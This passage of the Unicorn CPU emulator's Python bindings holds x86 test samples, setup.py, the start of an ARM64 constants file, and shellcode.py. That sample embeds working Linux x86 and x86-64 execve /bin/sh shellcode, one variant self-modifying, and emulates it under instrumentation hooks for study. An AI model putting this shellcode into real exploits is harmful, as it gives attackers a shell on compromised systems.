0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # handle IN & OUT instruction mu.hook_add(UC_HOOK_INSN, hook_in, None, 1, 0, UC_X86_INS_IN) mu.hook_add(UC_HOOK_INSN, hook_out, None, 1, 0, UC_X86_INS_OUT) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_INOUT)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_eax = mu.reg_read(UC_X86_REG_EAX) print(">>> EAX = 0x%x" %r_eax) print(">>> ECX = 0x%x" %r_ecx) except UcError as e: print("ERROR: %s" % e) def test_i386_context_save(): print("Save/restore CPU context in opaque blob") address = 0 code = b'\x40' # inc eax try: # Initialize emulator mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 8KB memory for this emulation mu.mem_map(address, 8 * 1024, UC_PROT_ALL) # write machine code to be emulated to memory mu.mem_write(address, code) # set eax to 1 mu.reg_write(UC_X86_REG_EAX, 1) print(">>> Running emulation for the first time") mu.emu_start(address, address+1) print(">>> Emulation done. Below is the CPU context") print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) print(">>> Saving CPU context") saved_context = mu.context_save() print(">>> Pickling CPU context") pickled_saved_context = pickle.dumps(saved_context) print(">>> Running emulation for the second time") mu.emu_start(address, address+1) print(">>> Emulation done. Below is the CPU context") print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) print(">>> Unpickling CPU context") saved_context = pickle.loads(pickled_saved_context) print(">>> Modifying some register.") saved_context.reg_write(UC_X86_REG_EAX, 0xc8c8) print(">>> CPU context restored. 
def test_x86_64():
    print("Emulate x86_64 code")
    try:
        # Initialize emulator in X86-64bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_64)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, X86_CODE64)

        # initialize machine registers
        mu.reg_write(UC_X86_REG_RAX, 0x71f3029efd49d41d)
        mu.reg_write(UC_X86_REG_RBX, 0xd87b45277f133ddb)
        mu.reg_write(UC_X86_REG_RCX, 0xab40d1ffd8afc461)
        mu.reg_write(UC_X86_REG_RDX, 0x919317b4a733f01)
        mu.reg_write(UC_X86_REG_RSI, 0x4c24e753a17ea358)
        mu.reg_write(UC_X86_REG_RDI, 0xe509a57d2571ce96)
        mu.reg_write(UC_X86_REG_R8, 0xea5b108cc2b9ab1f)
        mu.reg_write(UC_X86_REG_R9, 0x19ec097c8eb618c1)
        mu.reg_write(UC_X86_REG_R10, 0xec45774f00c5f682)
        mu.reg_write(UC_X86_REG_R11, 0xe17e9dbec8c074aa)
        mu.reg_write(UC_X86_REG_R12, 0x80f86a8dc0f6d457)
        mu.reg_write(UC_X86_REG_R13, 0x48288ca5671c5492)
        mu.reg_write(UC_X86_REG_R14, 0x595f72f6e4017f6e)
        mu.reg_write(UC_X86_REG_R15, 0x1efd97aea331cccc)

        # setup stack
        mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions in range [ADDRESS, ADDRESS+20]
        mu.hook_add(UC_HOOK_CODE, hook_code64, None, ADDRESS, ADDRESS+20)

        # tracing all memory READ & WRITE access
        mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_access)
        mu.hook_add(UC_HOOK_MEM_READ, hook_mem_access)
        # actually you can also use READ_WRITE to trace all memory access
        #mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access)

        try:
            # emulate machine code in infinite time
            mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE64))
        except UcError as e:
            print("ERROR: %s" % e)

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        rax = mu.reg_read(UC_X86_REG_RAX)
        rbx = mu.reg_read(UC_X86_REG_RBX)
        rcx = mu.reg_read(UC_X86_REG_RCX)
        rdx = mu.reg_read(UC_X86_REG_RDX)
        rsi = mu.reg_read(UC_X86_REG_RSI)
        rdi = mu.reg_read(UC_X86_REG_RDI)
        r8 = mu.reg_read(UC_X86_REG_R8)
        r9 = mu.reg_read(UC_X86_REG_R9)
        r10 = mu.reg_read(UC_X86_REG_R10)
        r11 = mu.reg_read(UC_X86_REG_R11)
        r12 = mu.reg_read(UC_X86_REG_R12)
        r13 = mu.reg_read(UC_X86_REG_R13)
        r14 = mu.reg_read(UC_X86_REG_R14)
        r15 = mu.reg_read(UC_X86_REG_R15)

        print(">>> RAX = 0x%x" %rax)
        print(">>> RBX = 0x%x" %rbx)
        print(">>> RCX = 0x%x" %rcx)
        print(">>> RDX = 0x%x" %rdx)
        print(">>> RSI = 0x%x" %rsi)
        print(">>> RDI = 0x%x" %rdi)
        print(">>> R8 = 0x%x" %r8)
        print(">>> R9 = 0x%x" %r9)
        print(">>> R10 = 0x%x" %r10)
        print(">>> R11 = 0x%x" %r11)
        print(">>> R12 = 0x%x" %r12)
        print(">>> R13 = 0x%x" %r13)
        print(">>> R14 = 0x%x" %r14)
        print(">>> R15 = 0x%x" %r15)

    except UcError as e:
        print("ERROR: %s" % e)
def test_x86_64_syscall():
    print("Emulate x86_64 code with 'syscall' instruction")
    try:
        # Initialize emulator in X86-64bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_64)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, X86_CODE64_SYSCALL)

        def hook_syscall(mu, user_data):
            rax = mu.reg_read(UC_X86_REG_RAX)
            if rax == 0x100:
                mu.reg_write(UC_X86_REG_RAX, 0x200)
            else:
                print('ERROR: was not expecting rax=%d in syscall' % rax)

        # hook interrupts for syscall
        mu.hook_add(UC_HOOK_INSN, hook_syscall, None, 1, 0, UC_X86_INS_SYSCALL)

        # syscall handler is expecting rax=0x100
        mu.reg_write(UC_X86_REG_RAX, 0x100)

        try:
            # emulate machine code in infinite time
            mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE64_SYSCALL))
        except UcError as e:
            print("ERROR: %s" % e)

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        rax = mu.reg_read(UC_X86_REG_RAX)
        print(">>> RAX = 0x%x" % rax)

    except UcError as e:
        print("ERROR: %s" % e)

def test_x86_16():
    print("Emulate x86 16-bit code")
    try:
        # Initialize emulator in X86-16bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_16)

        # map 8KB memory for this emulation
        mu.mem_map(0, 8 * 1024)

        # set CPU registers
        mu.reg_write(UC_X86_REG_EAX, 7)
        mu.reg_write(UC_X86_REG_EBX, 5)
        mu.reg_write(UC_X86_REG_ESI, 6)

        # write machine code to be emulated to memory
        mu.mem_write(0, X86_CODE16)

        # emulate machine code in infinite time
        mu.emu_start(0, len(X86_CODE16))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        tmp = mu.mem_read(11, 1)
        print(">>> Read 1 bytes from [0x%x] = 0x%x" %(11, tmp[0]))

    except UcError as e:
        print("ERROR: %s" % e)

def mmio_read_cb(uc, offset, size, data):
    print(f">>> Read IO memory at offset {hex(offset)} with {hex(size)} bytes and return 0x19260817")
    return 0x19260817

def mmio_write_cb(uc, offset, size, value, data):
    print(f">>> Write value {hex(value)} to IO memory at offset {hex(offset)} with {hex(size)} bytes")

def test_i386_mmio():
    print("Test i386 IO memory")
    try:
        # Initialize emulator in X86-32bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # map 8KB memory for this emulation and write the code
        mu.mem_map(0x10000, 0x8000)
        mu.mem_write(0x10000, X86_MMIO_CODE)

        # map the IO memory
        mu.mmio_map(0x20000, 0x4000, mmio_read_cb, None, mmio_write_cb, None)

        # prepare registers.
        mu.reg_write(UC_X86_REG_ECX, 0xdeadbeef)

        # emulate machine code in infinite time
        mu.emu_start(0x10000, 0x10000 + len(X86_MMIO_CODE))

        # now print out some registers
        print(f">>> Emulation done. ECX={hex(mu.reg_read(UC_X86_REG_ECX))}")

    except UcError as e:
        print("ERROR: %s" % e)
if __name__ == '__main__':
    test_x86_16()
    test_i386()
    print("=" * 35)
    test_i386_map_ptr()
    print("=" * 35)
    test_i386_inout()
    print("=" * 35)
    test_i386_context_save()
    print("=" * 35)
    test_i386_jump()
    print("=" * 35)
    test_i386_loop()
    print("=" * 35)
    test_i386_invalid_mem_read()
    print("=" * 35)
    test_i386_invalid_mem_write()
    print("=" * 35)
    test_i386_jump_invalid()
    test_x86_64()
    print("=" * 35)
    test_x86_64_syscall()
    print("=" * 35)
    test_i386_mmio()

unicorn-2.1.1/bindings/python/setup.cfg

[bdist_wheel]
universal=1

unicorn-2.1.1/bindings/python/setup.py

#!/usr/bin/env python
# Python binding for Unicorn engine. Nguyen Anh Quynh <aquynh@gmail.com>

from __future__ import print_function
import glob
import logging
import os
import subprocess
import shutil
import sys
import platform
import setuptools
from setuptools import setup
from sysconfig import get_platform
from setuptools.command.build import build
from setuptools.command.sdist import sdist
from setuptools.command.bdist_egg import bdist_egg

log = logging.getLogger(__name__)

SYSTEM = sys.platform

# sys.maxint is 2**31 - 1 on both 32 and 64 bit mingw
IS_64BITS = platform.architecture()[0] == '64bit'

# are we building from the repository or from a source distribution?
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
LIBS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'lib')
HEADERS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'include')
SRC_DIR = os.path.join(ROOT_DIR, 'src')
UC_DIR = SRC_DIR if os.path.exists(SRC_DIR) else os.path.join(ROOT_DIR, '../..')
BUILD_DIR = os.path.join(UC_DIR, 'build_python')

VERSION = "2.1.1"

if SYSTEM == 'darwin':
    LIBRARY_FILE = "libunicorn.2.dylib"
    STATIC_LIBRARY_FILE = "libunicorn.a"
elif SYSTEM in ('win32', 'cygwin'):
    LIBRARY_FILE = "unicorn.dll"
    STATIC_LIBRARY_FILE = "unicorn.lib"
else:
    LIBRARY_FILE = "libunicorn.so.2"
    STATIC_LIBRARY_FILE = "libunicorn.a"

def clean_bins():
    shutil.rmtree(LIBS_DIR, ignore_errors=True)
    shutil.rmtree(HEADERS_DIR, ignore_errors=True)

def copy_sources():
    """Copy the C sources into the source directory.
    This rearranges the source files under the python distribution
    directory.
    """
    src = []

    shutil.rmtree(SRC_DIR, ignore_errors=True)
    os.mkdir(SRC_DIR)

    shutil.copytree(os.path.join(ROOT_DIR, '../../qemu'), os.path.join(SRC_DIR, 'qemu/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../msvc'), os.path.join(SRC_DIR, 'msvc/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../include'), os.path.join(SRC_DIR, 'include/'))
    # make -> configure -> clean -> clean tests fails unless tests is present
    shutil.copytree(os.path.join(ROOT_DIR, '../../tests'), os.path.join(SRC_DIR, 'tests/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../samples'), os.path.join(SRC_DIR, 'samples/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../glib_compat'), os.path.join(SRC_DIR, 'glib_compat/'))

    try:
        # remove site-specific configuration file -- might not exist
        os.remove(os.path.join(SRC_DIR, 'qemu/config-host.mak'))
    except OSError:
        pass

    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.[ch]")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.mk")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../cmake/*.cmake")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../LICENSE*")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../README.md")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.TXT")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../CMakeLists.txt")))

    for filename in src:
        outpath = os.path.join(SRC_DIR, os.path.basename(filename))
        log.info("%s -> %s" % (filename, outpath))
        shutil.copy(filename, outpath)

def build_libraries():
    """
    Prepare the unicorn directory for a binary distribution or installation.
    Builds shared libraries and copies header files.
    Will use a src/ dir if one exists in the current directory, otherwise assumes it's in the repo.
    """
    cwd = os.getcwd()
    clean_bins()
    os.mkdir(HEADERS_DIR)
    os.mkdir(LIBS_DIR)

    # copy public headers
    shutil.copytree(os.path.join(UC_DIR, 'include', 'unicorn'), os.path.join(HEADERS_DIR, 'unicorn'))

    # check if a prebuilt library exists; if so, use it instead of building
    if os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE)):
        shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE), LIBS_DIR)
        if STATIC_LIBRARY_FILE is not None and os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE)):
            shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE), LIBS_DIR)
        return

    # otherwise, build!!
    os.chdir(UC_DIR)

    try:
        subprocess.check_call(['msbuild', '/help'])
    except Exception:
        has_msbuild = False
    else:
        has_msbuild = True

    if has_msbuild and SYSTEM == 'win32':
        plat = 'Win32' if platform.architecture()[0] == '32bit' else 'x64'
        conf = 'Debug' if os.getenv('DEBUG', '') else 'Release'

        if not os.path.exists(BUILD_DIR):
            os.mkdir(BUILD_DIR)

        subprocess.check_call(['cmake', '-B', BUILD_DIR, '-G', "Visual Studio 16 2019", "-A", plat, "-DCMAKE_BUILD_TYPE=" + conf])
        subprocess.check_call(['msbuild', 'unicorn.sln', '-m', '-p:Platform=' + plat, '-p:Configuration=' + conf], cwd=BUILD_DIR)

        obj_dir = os.path.join(BUILD_DIR, conf)
        shutil.copy(os.path.join(obj_dir, LIBRARY_FILE), LIBS_DIR)
        shutil.copy(os.path.join(BUILD_DIR, STATIC_LIBRARY_FILE), LIBS_DIR)
    else:
        # platform description refs at https://docs.python.org/2/library/sys.html#sys.platform
        if not os.path.exists(BUILD_DIR):
            os.mkdir(BUILD_DIR)

        conf = 'Debug' if os.getenv('DEBUG', '') else 'Release'
        cmake_args = ["cmake", '-B', BUILD_DIR, '-S', UC_DIR, "-DCMAKE_BUILD_TYPE=" + conf]
        if os.getenv("TRACE", ""):
            cmake_args += ["-DUNICORN_TRACER=on"]
        subprocess.check_call(cmake_args)
        os.chdir(BUILD_DIR)
        threads = os.getenv("THREADS", "4")
        subprocess.check_call(["cmake", "--build", ".", "-j" + threads])

        shutil.copy(LIBRARY_FILE, LIBS_DIR)
        shutil.copy(STATIC_LIBRARY_FILE, LIBS_DIR)

    os.chdir(cwd)

class custom_sdist(sdist):
    def run(self):
        clean_bins()
        copy_sources()
        return sdist.run(self)

class custom_build(build):
    def run(self):
        if 'LIBUNICORN_PATH' in os.environ:
            log.info("Skipping building C extensions since LIBUNICORN_PATH is set")
        else:
            log.info("Building C extensions")
            build_libraries()
        return build.run(self)

class custom_bdist_egg(bdist_egg):
    def run(self):
        self.run_command('build')
        return bdist_egg.run(self)

def dummy_src():
    return []

cmdclass = {}
cmdclass['build'] = custom_build
cmdclass['sdist'] = custom_sdist
cmdclass['bdist_egg'] = custom_bdist_egg

if 'bdist_wheel' in sys.argv and '--plat-name' not in sys.argv:
    idx = sys.argv.index('bdist_wheel') + 1
    sys.argv.insert(idx, '--plat-name')
    name = get_platform()
    if 'linux' in name:
        # linux_* platform tags are disallowed because the python ecosystem is fubar
        # linux builds should be built in the centos 5 vm for maximum compatibility
        # see https://github.com/pypa/manylinux
        # see also https://github.com/angr/angr-dev/blob/master/bdist.sh
        sys.argv.insert(idx + 1, 'manylinux1_' + platform.machine())
    elif 'mingw' in name:
        if IS_64BITS:
            sys.argv.insert(idx + 1, 'win_amd64')
        else:
            sys.argv.insert(idx + 1, 'win32')
    else:
        # https://www.python.org/dev/peps/pep-0425/
        sys.argv.insert(idx + 1, name.replace('.', '_').replace('-', '_'))

try:
    from setuptools.command.develop import develop

    class custom_develop(develop):
        def run(self):
            log.info("Building C extensions")
            build_libraries()
            return develop.run(self)

    cmdclass['develop'] = custom_develop
except ImportError:
    print("Proper 'develop' support unavailable.")

def join_all(src, files):
    return tuple(os.path.join(src, f) for f in files)

long_desc = '''
Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework
based on [QEMU](http://qemu.org).

Unicorn offers some unparalleled features:

- Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, PowerPC, RISCV, SPARC, S390X, TriCore and X86 (16, 32, 64-bit)
- Clean/simple/lightweight/intuitive architecture-neutral API
- Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, and Lua.
- Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed)
- High performance via Just-In-Time compilation
- Support for fine-grained instrumentation at various levels
- Thread-safety by design
- Distributed under free software license GPLv2

Further information is available at http://www.unicorn-engine.org
'''

setup(
    provides=['unicorn'],
    packages=setuptools.find_packages(include=["unicorn", "unicorn.*"]),
    name='unicorn',
    version=VERSION,
    author='Nguyen Anh Quynh',
    author_email='aquynh@gmail.com',
    description='Unicorn CPU emulator engine',
    long_description=long_desc,
    long_description_content_type="text/markdown",
    url='http://www.unicorn-engine.org',
    classifiers=[
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 3',
    ],
    requires=['ctypes'],
    cmdclass=cmdclass,
    zip_safe=False,
    include_package_data=True,
    is_pure=False,
    package_data={
        'unicorn': ['unicorn/py.typed', 'lib/*', 'include/unicorn/*']
    }
)

unicorn-2.1.1/bindings/python/shellcode.py

#!/usr/bin/env python
# Sample code for X86 of Unicorn.
# Nguyen Anh Quynh <aquynh@gmail.com>
# KaiJern Lau <kj@theshepherdlab.io>

from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *

# Original shellcode from this example.
#X86_CODE32 = b"\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f"

# Linux/x86 execve /bin/sh shellcode 23 bytes, from http://shell-storm.org/shellcode/files/shellcode-827.php
#  0: 31 c0           xor    eax, eax
#  2: 50              push   eax
#  3: 68 2f 2f 73 68  push   0x68732f2f
#  8: 68 2f 62 69 6e  push   0x6e69622f
#  d: 89 e3           mov    ebx, esp
#  f: 50              push   eax
# 10: 53              push   ebx
# 11: 89 e1           mov    ecx, esp
# 13: b0 0b           mov    al, 0xb
# 15: cd 80           int    0x80
X86_CODE32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

X86_CODE32_SELF = b"\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41"

# Linux/x86 64bit execve /bin/sh shellcode
#  0: 48 31 ff              xor    rdi, rdi
#  3: 57                    push   rdi
#  4: 57                    push   rdi
#  5: 5e                    pop    rsi
#  6: 5a                    pop    rdx
#  7: 48 bf 2f 2f 62 69 6e  movabs rdi, 0x68732f6e69622f2f
#  e: 2f 73 68
# 11: 48 c1 ef 08           shr    rdi, 0x8
# 15: 57                    push   rdi
# 16: 54                    push   rsp
# 17: 5f                    pop    rdi
# 18: 6a 3b                 push   0x3b
# 1a: 58                    pop    rax
# 1b: 0f 05                 syscall
X86_CODE64 = b"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"

# memory address where emulation starts
ADDRESS = 0x1000000

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))

    # read this instruction code from memory
    tmp = uc.mem_read(address, size)
    print("*** PC = %x *** :" %(address), end="")
    for i in tmp:
        print(" %02x" %i, end="")
    print("")

# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))

def read_string(uc, address):
    ret = ""
    c = uc.mem_read(address, 1)[0]
    read_bytes = 1

    while c != 0x0:
        ret += chr(c)
        c = uc.mem_read(address + read_bytes, 1)[0]
        read_bytes += 1

    return ret
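# Hedged alternative sketch (editor's addition): read_string above fetches one
# byte per call; when an upper bound on string length is acceptable, a single
# bulk read is simpler. `limit` is a hypothetical parameter, and reading past
# the mapped region raises UcError.
def read_cstr(uc, address, limit=0x100):
    data = bytes(uc.mem_read(address, limit))
    return data.split(b"\x00", 1)[0].decode("latin-1")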

# callback for tracing Linux interrupt
def hook_intr(uc, intno, user_data):
    # only handle Linux syscall
    if intno != 0x80:
        print("got interrupt %x ???" %intno)
        uc.emu_stop()
        return

    eax = uc.reg_read(UC_X86_REG_EAX)
    eip = uc.reg_read(UC_X86_REG_EIP)

    if eax == 1:    # sys_exit
        print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(eip, intno, eax))
        uc.emu_stop()
    elif eax == 4:  # sys_write
        # ECX = buffer address
        ecx = uc.reg_read(UC_X86_REG_ECX)
        # EDX = buffer size
        edx = uc.reg_read(UC_X86_REG_EDX)
        try:
            buf = uc.mem_read(ecx, edx)
            print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = " \
                    %(eip, intno, ecx, edx), end="")
            for i in buf:
                print("%c" %i, end="")
            print("")
        except UcError as e:
            print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = <unknown>\n" \
                    %(eip, intno, ecx, edx))
    elif eax == 11: # sys_execve (0x0b), not sys_write
        ebx = uc.reg_read(UC_X86_REG_EBX)
        filename = read_string(uc, ebx)
        print(">>> SYS_EXECV filename=%s" % filename)
    else:
        print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(eip, intno, eax))


def hook_syscall32(mu, user_data):
    eax = mu.reg_read(UC_X86_REG_EAX)
    print(">>> got SYSCALL with EAX = 0x%x" %(eax))
    mu.emu_stop()


def hook_syscall64(mu, user_data):
    rax = mu.reg_read(UC_X86_REG_RAX)
    rdi = mu.reg_read(UC_X86_REG_RDI)
    print(">>> got SYSCALL with RAX = %d" %(rax))
    if rax == 59:   # sys_execve
        filename = read_string(mu, rdi)
        print(">>> SYS_EXECV filename=%s" % filename)
    else:
        rip = mu.reg_read(UC_X86_REG_RIP)
        print(">>> Syscall Found at 0x%x: , RAX = 0x%x" %(rip, rax))
    mu.emu_stop()


# Test X86 32 bit
def test_i386(mode, code):
    if mode == UC_MODE_32:
        print("Emulate x86_32 code")
    elif mode == UC_MODE_64:
        print("Emulate x86_64 code")

    try:
        # Initialize emulator
        mu = Uc(UC_ARCH_X86, mode)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, code)

        # initialize stack
        mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        if mode == UC_MODE_32:
            # handle interrupt ourself
            mu.hook_add(UC_HOOK_INTR, hook_intr)
            # handle SYSCALL
            mu.hook_add(UC_HOOK_INSN, hook_syscall32, None, 1, 0, UC_X86_INS_SYSCALL)
        elif mode == UC_MODE_64:
            mu.hook_add(UC_HOOK_INSN, hook_syscall64, None, 1, 0, UC_X86_INS_SYSCALL)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(code))

        # now print out some registers
        print(">>> Emulation done")
    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_i386(UC_MODE_32, X86_CODE32_SELF)
    print("=" * 20)
    test_i386(UC_MODE_32, X86_CODE32)
    print("=" * 20)
    test_i386(UC_MODE_64, X86_CODE64)

unicorn-2.1.1/bindings/python/unicorn/__init__.py

# Forwarding defs for compatibility
from . import arm_const, arm64_const, mips_const, sparc_const, m68k_const, x86_const, riscv_const, s390x_const, tricore_const
from .unicorn_const import *
from .unicorn import Uc, ucsubclass, uc_version, uc_arch_supported, version_bind, debug, UcError, __version__

unicorn-2.1.1/bindings/python/unicorn/arm64_const.py

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.py]

# ARM64 CPU
UC_CPU_ARM64_A57 = 0 UC_CPU_ARM64_A53 = 1 UC_CPU_ARM64_A72 = 2 UC_CPU_ARM64_MAX = 3 UC_CPU_ARM64_ENDING = 4

# ARM64 registers
UC_ARM64_REG_INVALID = 0 UC_ARM64_REG_X29 = 1 UC_ARM64_REG_X30 = 2 UC_ARM64_REG_NZCV = 3 UC_ARM64_REG_SP = 4 UC_ARM64_REG_WSP = 5 UC_ARM64_REG_WZR = 6 UC_ARM64_REG_XZR = 7
UC_ARM64_REG_B0 = 8 UC_ARM64_REG_B1 = 9 UC_ARM64_REG_B2 = 10 UC_ARM64_REG_B3 = 11 UC_ARM64_REG_B4 = 12 UC_ARM64_REG_B5 = 13 UC_ARM64_REG_B6 = 14 UC_ARM64_REG_B7 = 15 UC_ARM64_REG_B8 = 16 UC_ARM64_REG_B9 = 17 UC_ARM64_REG_B10 = 18 UC_ARM64_REG_B11 = 19 UC_ARM64_REG_B12 = 20 UC_ARM64_REG_B13 = 21 UC_ARM64_REG_B14 = 22 UC_ARM64_REG_B15 = 23 UC_ARM64_REG_B16 = 24 UC_ARM64_REG_B17 = 25 UC_ARM64_REG_B18 = 26 UC_ARM64_REG_B19 = 27 UC_ARM64_REG_B20 = 28 UC_ARM64_REG_B21 = 29 UC_ARM64_REG_B22 = 30 UC_ARM64_REG_B23 = 31 UC_ARM64_REG_B24 = 32 UC_ARM64_REG_B25 = 33 UC_ARM64_REG_B26 = 34 UC_ARM64_REG_B27 = 35 UC_ARM64_REG_B28 = 36 UC_ARM64_REG_B29 = 37 UC_ARM64_REG_B30 = 38 UC_ARM64_REG_B31 = 39
UC_ARM64_REG_D0 = 40 UC_ARM64_REG_D1 = 41 UC_ARM64_REG_D2 = 42 UC_ARM64_REG_D3 = 43 UC_ARM64_REG_D4 = 44 UC_ARM64_REG_D5 = 45 UC_ARM64_REG_D6 = 46 UC_ARM64_REG_D7 = 47 UC_ARM64_REG_D8 = 48 UC_ARM64_REG_D9 = 49 UC_ARM64_REG_D10 = 50 UC_ARM64_REG_D11 = 51 UC_ARM64_REG_D12 = 52 UC_ARM64_REG_D13 = 53 UC_ARM64_REG_D14 = 54 UC_ARM64_REG_D15 = 55 UC_ARM64_REG_D16 = 56 UC_ARM64_REG_D17 = 57 UC_ARM64_REG_D18 = 58 UC_ARM64_REG_D19 = 59 UC_ARM64_REG_D20 = 60 UC_ARM64_REG_D21 = 61 UC_ARM64_REG_D22 = 62 UC_ARM64_REG_D23 = 63 UC_ARM64_REG_D24 = 64 UC_ARM64_REG_D25 = 65 UC_ARM64_REG_D26 = 66 UC_ARM64_REG_D27 = 67 UC_ARM64_REG_D28 = 68 UC_ARM64_REG_D29 = 69 UC_ARM64_REG_D30 = 70 UC_ARM64_REG_D31 = 71
UC_ARM64_REG_H0 = 72 UC_ARM64_REG_H1 = 73 UC_ARM64_REG_H2 = 74 UC_ARM64_REG_H3 = 75 UC_ARM64_REG_H4 = 76 UC_ARM64_REG_H5 = 77 UC_ARM64_REG_H6 = 78 UC_ARM64_REG_H7 = 79 UC_ARM64_REG_H8 = 80 UC_ARM64_REG_H9 = 81 UC_ARM64_REG_H10 = 82 UC_ARM64_REG_H11 = 83 UC_ARM64_REG_H12 = 84 UC_ARM64_REG_H13 = 85 UC_ARM64_REG_H14 = 86 UC_ARM64_REG_H15 = 87 UC_ARM64_REG_H16 = 88 UC_ARM64_REG_H17 = 89 UC_ARM64_REG_H18 = 90 UC_ARM64_REG_H19 = 91 UC_ARM64_REG_H20 = 92 UC_ARM64_REG_H21 = 93 UC_ARM64_REG_H22 = 94 UC_ARM64_REG_H23 = 95 UC_ARM64_REG_H24 = 96 UC_ARM64_REG_H25 = 97 UC_ARM64_REG_H26 = 98 UC_ARM64_REG_H27 = 99 UC_ARM64_REG_H28 = 100 UC_ARM64_REG_H29 = 101 UC_ARM64_REG_H30 = 102 UC_ARM64_REG_H31 = 103
UC_ARM64_REG_Q0 = 104 UC_ARM64_REG_Q1 = 105 UC_ARM64_REG_Q2 = 106 UC_ARM64_REG_Q3 = 107 UC_ARM64_REG_Q4 =
